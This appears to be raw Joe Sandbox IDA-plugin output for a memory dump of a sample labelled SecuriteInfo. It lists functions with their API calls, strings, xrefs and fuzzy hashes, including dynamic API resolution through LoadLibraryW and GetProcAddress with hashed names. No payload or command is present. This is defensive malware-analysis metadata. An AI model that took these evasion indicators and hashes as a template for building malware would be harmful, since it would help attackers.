.l, xrefs: 6CEAE4DB, 6CEAE4FC, 6CEAE4DE
.l, xrefs: 6CEAE551

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArraySafe$BoundData$AccessCompareDestroyExchangeInterlockedUnaccessXweak_mallocstd::tr1::_
String ID: .l$ .l
API String ID: 2722669376-2945158243
Opcode ID: 80d6882047aa25939c11d3177c8a3bef7e68da9475196673ce43255247837af1
Instruction ID: cfda427e7b08feb416565a712e9de066284e16b2e2ae9e4be2f2836a30bfdff8
Opcode Fuzzy Hash: 80d6882047aa25939c11d3177c8a3bef7e68da9475196673ce43255247837af1
Instruction Fuzzy Hash: 3CD1C1B1A006049FDB00DFE4C884BAE77B9AF45308F348569E815AF781D775E91ACBA1

Function 6CECC1B0 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 266COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CECC213

Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF90ED
Part of subcall function 6CEF90D8: __CxxThrowException@8.LIBCMT ref: 6CEF9102
Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF9113

Strings

gfff, xrefs: 6CECC222
gfff, xrefs: 6CECC2EA
vector<T> too long, xrefs: 6CECC20E
gfff, xrefs: 6CECC3A3
gfff, xrefs: 6CECC1F2
gfff, xrefs: 6CECC3F7
gfff, xrefs: 6CECC259

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: gfff$gfff$gfff$gfff$gfff$gfff$vector<T> too long
API String ID: 1823113695-1254974138
Opcode ID: e3cd3a08d05684e616086ce22195e135840cc6893d3fc821926fc9e2e05c8392
Instruction ID: 73e93f5fcecc7168e7cc5a01693582822de8eddb81cae43b6b19f6f7ad530668
Opcode Fuzzy Hash: e3cd3a08d05684e616086ce22195e135840cc6893d3fc821926fc9e2e05c8392
Instruction Fuzzy Hash: B19166B1A00609AFCB18DF59DD90EEEB7B9EB88314F14861DE959DB740D730BA04CB91

Function 6CEA0CD0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 196COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CEA0D3A
std::_Xinvalid_argument.LIBCPMT ref: 6CEA0D60
_memmove.LIBCMT ref: 6CEA0D95
std::_Xinvalid_argument.LIBCPMT ref: 6CEA0DBF
_memmove.LIBCMT ref: 6CEA0E3E

Strings

invalid string position, xrefs: 6CEA0D35
string too long, xrefs: 6CEA0D5B, 6CEA0DBA

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: invalid string position$string too long
API String ID: 2168136238-4289949731
Opcode ID: 97ecd480414b02ada19edc5e35923809078a028cb98fafeeb12c4a31bfa1aa3e
Instruction ID: 29fe88008b765aee7e3e8fd332287807009f7c3793d84811233b1a124e5a0c0a
Opcode Fuzzy Hash: 97ecd480414b02ada19edc5e35923809078a028cb98fafeeb12c4a31bfa1aa3e
Instruction Fuzzy Hash: 3D5193323011449FD724CE9CD880A5EB7B6DBC5714B348A2EE856CFB84DB71EC568792

Function 6CEF42B0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 186COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CEF42DD

Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF90ED
Part of subcall function 6CEF90D8: __CxxThrowException@8.LIBCMT ref: 6CEF9102
Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF9113

_memmove.LIBCMT ref: 6CEF4363
_memmove.LIBCMT ref: 6CEF4381
_memmove.LIBCMT ref: 6CEF43E6
_memmove.LIBCMT ref: 6CEF4453
_memmove.LIBCMT ref: 6CEF4474

Strings

vector<T> too long, xrefs: 6CEF42D8
lgl, xrefs: 6CEF442C, 6CEF43CC, 6CEF4343

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: _memmove$std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: lgl$vector<T> too long
API String ID: 4034224661-3885013920
Opcode ID: 2c68ce88f7188ce499649d95559e85256136cccc4f191dee7dd707724646c6ce
Instruction ID: 8f69b325d1274b3836e022b8bab34b8d038e14b60abb6cb621a05f820da4adef
Opcode Fuzzy Hash: 2c68ce88f7188ce499649d95559e85256136cccc4f191dee7dd707724646c6ce
Instruction Fuzzy Hash: 9F5192B17042068FC718CF68DD8496BB7E5EBD4318F284E2DE896C3744EA75E905CA62

Function 6CEC1B20 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 154libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(User32.dll,?,00000000,?,?,?,?,?,?,?,?), ref: 6CEC1C5E
LoadLibraryW.KERNEL32(User32.dll,?,00000000,?,?,?,?,?,?,?,?), ref: 6CEC1C69
GetProcAddress.KERNEL32(00000000,F1F2E532), ref: 6CEC1CA2
GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 6CEC1CC1
LoadLibraryW.KERNEL32(kernel32.dll,?,00000000), ref: 6CEC1CCC
GetProcAddress.KERNEL32(00000000,EFF3E52B), ref: 6CEC1D0A

Strings

kernel32.dll, xrefs: 6CEC1CBA, 6CEC1CC7
User32.dll, xrefs: 6CEC1C57, 6CEC1C64

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID: User32.dll$kernel32.dll
API String ID: 310444273-1965990335
Opcode ID: 8a98af6d00bb84a4973ccdb879963e50ed5a2c04b16e0e7a9c89225657604532
Instruction ID: 24848a94009e41acc7f7ecbe93f0520f89aa2d3abdcc6d6be7a6ba55fbdd7b99
Opcode Fuzzy Hash: 8a98af6d00bb84a4973ccdb879963e50ed5a2c04b16e0e7a9c89225657604532
Instruction Fuzzy Hash: 74614F75600A009FC760CF99C282A6ABBF1FB55304F74895CE4A69BF52D736EC46CB81

Function 6CEBC150 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 99COMMON

Download Yara Rule

APIs

SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CEBC180
SafeArrayPutElement.OLEAUT32(00000000,I7l,?), ref: 6CEBC1B8
VariantClear.OLEAUT32(?), ref: 6CEBC1C4
VariantCopy.OLEAUT32(I7l,?), ref: 6CEBC21B
VariantClear.OLEAUT32(?), ref: 6CEBC22F
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEBC23E

Strings

I7l, xrefs: 6CEBC1B3, 6CEBC1CE, 6CEBC1B6
I7l, xrefs: 6CEBC20C, 6CEBC213

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArraySafeVariant$Clear$CopyCreateDestroyElementVector
String ID: I7l$I7l
API String ID: 3979206172-4116127961
Opcode ID: 45a47eb61d50fc818e45b2dd8dd298cbe3776d9e7f391dc2ac49fb580249b513
Instruction ID: 87760ed5c156ca330c319d6814068714b6219af062b926865c331ba4c3d89dd6
Opcode Fuzzy Hash: 45a47eb61d50fc818e45b2dd8dd298cbe3776d9e7f391dc2ac49fb580249b513
Instruction Fuzzy Hash: 6F318E71B04609AFDB01DFA4C885FAEBBB8EF89314F118119E915E7750EB30D801CB60

Function 6CF04409 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

UnDecorator::getArgumentList.LIBCMT ref: 6CF0442E

Part of subcall function 6CF03FC9: Replicator::operator[].LIBCMT ref: 6CF0404C
Part of subcall function 6CF03FC9: DName::operator+=.LIBCMT ref: 6CF04054

DName::operator+.LIBCMT ref: 6CF04487
DName::DName.LIBCMT ref: 6CF044DF

Strings

,..., xrefs: 6CF04473
<ellipsis>, xrefs: 6CF044C9, 6CF044CE
void, xrefs: 6CF044D7
,<ellipsis>, xrefs: 6CF0447A, 6CF0447F
..., xrefs: 6CF044C2

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
String ID: ,...$,<ellipsis>$...$<ellipsis>$void
API String ID: 834187326-2211150622
Opcode ID: 47e4685f1e2443e9b8edbcec4a1bbe2c330e752bf551037d728265ac1e0bf2dd
Instruction ID: 644c3fb35d699acb1fd7112cdbfb43ce818a80ac58b7d545831cf759d57bb129
Opcode Fuzzy Hash: 47e4685f1e2443e9b8edbcec4a1bbe2c330e752bf551037d728265ac1e0bf2dd
Instruction Fuzzy Hash: E821DEB4B14108AFCB51DF58C061AA97FF5EB56B99B108285EC09DBB12CB30D903EB90

Function 6CF05D36 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55COMMONLIBRARYCODE

Download Yara Rule

APIs

UnDecorator::UScore.LIBCMT ref: 6CF05D40
DName::DName.LIBCMT ref: 6CF05D4C

Part of subcall function 6CF03B3B: DName::doPchar.LIBCMT ref: 6CF03B6C

UnDecorator::getScopedName.LIBCMT ref: 6CF05D8B
DName::operator+=.LIBCMT ref: 6CF05D95
DName::operator+=.LIBCMT ref: 6CF05DA4
DName::operator+=.LIBCMT ref: 6CF05DB0
DName::operator+=.LIBCMT ref: 6CF05DBD

Strings

void, xrefs: 6CF05D9C

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
String ID: void
API String ID: 1480779885-3531332078
Opcode ID: f2abcaae0920636a7f67c3c154f6b03b6b45aca8192702be7fc27ef1b014d240
Instruction ID: a5720f78ac2c6800232bb06e4eeac14e602a5661f469f58a2a8d04fde75cca44
Opcode Fuzzy Hash: f2abcaae0920636a7f67c3c154f6b03b6b45aca8192702be7fc27ef1b014d240
Instruction Fuzzy Hash: D411E971B05204EFD708DB68C8A9FED7BB09B01B05F004099D4159BB90DB709A4ADB44

Function 6CEB3F10 Relevance: 13.7, APIs: 9, Instructions: 201COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CEB3F7B
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEB3F8D
VariantInit.OLEAUT32(?), ref: 6CEB3FB7
SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CEB3FD0
VariantClear.OLEAUT32(?), ref: 6CEB40C9
VariantClear.OLEAUT32(?), ref: 6CEB4105
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB4123
VariantClear.OLEAUT32(?), ref: 6CEB4157
VariantClear.OLEAUT32(?), ref: 6CEB4168

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Variant$ArrayClearSafe$Bound$DestroyElementInit
String ID:
API String ID: 758290628-0
Opcode ID: 8eb0cbf787e8b1a6cd1dcca557997b88d03a61a0bc26c8bd83844c188575a684
Instruction ID: e8189f13b7f497465f65ee33b6909b07209f494386a3d8d6684b43c9344d7ddc
Opcode Fuzzy Hash: 8eb0cbf787e8b1a6cd1dcca557997b88d03a61a0bc26c8bd83844c188575a684
Instruction Fuzzy Hash: 847187726093819FC700DF68C98196BBBF4BBD9318F244A2DF195A7650C770E949CB92

Function 6CE9FC30 Relevance: 13.7, APIs: 9, Instructions: 154fileCOMMON

Download Yara Rule

APIs

UnmapViewOfFile.KERNEL32(00000000,?,?,00000000,67D4BDE6), ref: 6CE9FC98
CloseHandle.KERNEL32(FFFFFFFF,?,?,00000000,67D4BDE6), ref: 6CE9FCAD
CloseHandle.KERNEL32(?,?,?,00000000,67D4BDE6), ref: 6CE9FCB7
SetLastError.KERNEL32(00000000,?,?,00000000,67D4BDE6), ref: 6CE9FCBA
CreateFileW.KERNEL32(?,-00000001,00000001,00000000,00000003,00000000,00000000,?,?,00000000,67D4BDE6), ref: 6CE9FD01
GetFileSizeEx.KERNEL32(00000000,?,?,?,00000000,67D4BDE6), ref: 6CE9FD14
GetLastError.KERNEL32(?,?,00000000,67D4BDE6), ref: 6CE9FD2A
CreateFileMappingW.KERNEL32(?,00000000,?,00000000,00000000,00000000,?,?,00000000,67D4BDE6), ref: 6CE9FD6B
MapViewOfFile.KERNEL32(00000000,?,00000000,00000000,00000000,?,?,00000000,67D4BDE6), ref: 6CE9FD98

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: File$CloseCreateErrorHandleLastView$MappingSizeUnmap
String ID:
API String ID: 1303881157-0
Opcode ID: 22c6c2f68c77dfcfaeb204ff7ba67d23c6241122159464e31bcd1ade8d5db43e
Instruction ID: eb35ee4bc877b7ae3c31eba0aa20e8996c0037d5b97ff5b9ba7107310129363e
Opcode Fuzzy Hash: 22c6c2f68c77dfcfaeb204ff7ba67d23c6241122159464e31bcd1ade8d5db43e
Instruction Fuzzy Hash: 8351D3B5A04301AFDB008F35C885B9A7BB4AB89368F3586A9FC14CF7C5D774D8058BA5

Function 6CEC4B60 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 143COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CEC4BC8
std::_Xinvalid_argument.LIBCPMT ref: 6CEC4BE0
std::_Xinvalid_argument.LIBCPMT ref: 6CEC4BFA
_memmove.LIBCMT ref: 6CEC4C64
_memmove.LIBCMT ref: 6CEC4C81

Strings

invalid string position, xrefs: 6CEC4BC3
string too long, xrefs: 6CEC4BDB, 6CEC4BF5

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: invalid string position$string too long
API String ID: 2168136238-4289949731
Opcode ID: 7244f3edf980daabe1d27993a41b63f21be264c2b4911571d92f09ad42955135
Instruction ID: 405cd40e67713cd114900ed3fb31e34ed9112a5e2a866d1110e47feb42ad92ba
Opcode Fuzzy Hash: 7244f3edf980daabe1d27993a41b63f21be264c2b4911571d92f09ad42955135
Instruction Fuzzy Hash: C74142323056108BE7249E5C9A80E7EB3F9DBA6714B710A1FF0B187F50D7619C458763

Function 6CEAFFEA Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 130COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB240F

Strings

RSDi, xrefs: 6CEB0075

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArrayDestroySafe
String ID: RSDi
API String ID: 4225690600-559181253
Opcode ID: 60ffb48540661dde96fb2d8ea5f92d13aa58d6aa58385b16feabba6237411fd2
Instruction ID: 250c1938f2c8097ee40dd13e586540c6ee3f950b07a17ca1cde3d2faab9ef346
Opcode Fuzzy Hash: 60ffb48540661dde96fb2d8ea5f92d13aa58d6aa58385b16feabba6237411fd2
Instruction Fuzzy Hash: 47414EB4A016049FCB00DFA9CA84A6EB7F9AF89308F308599E519EB755DB31ED41CF50

Function 6CEB0815 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB240F

Strings

RSUa, xrefs: 6CEB0864

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
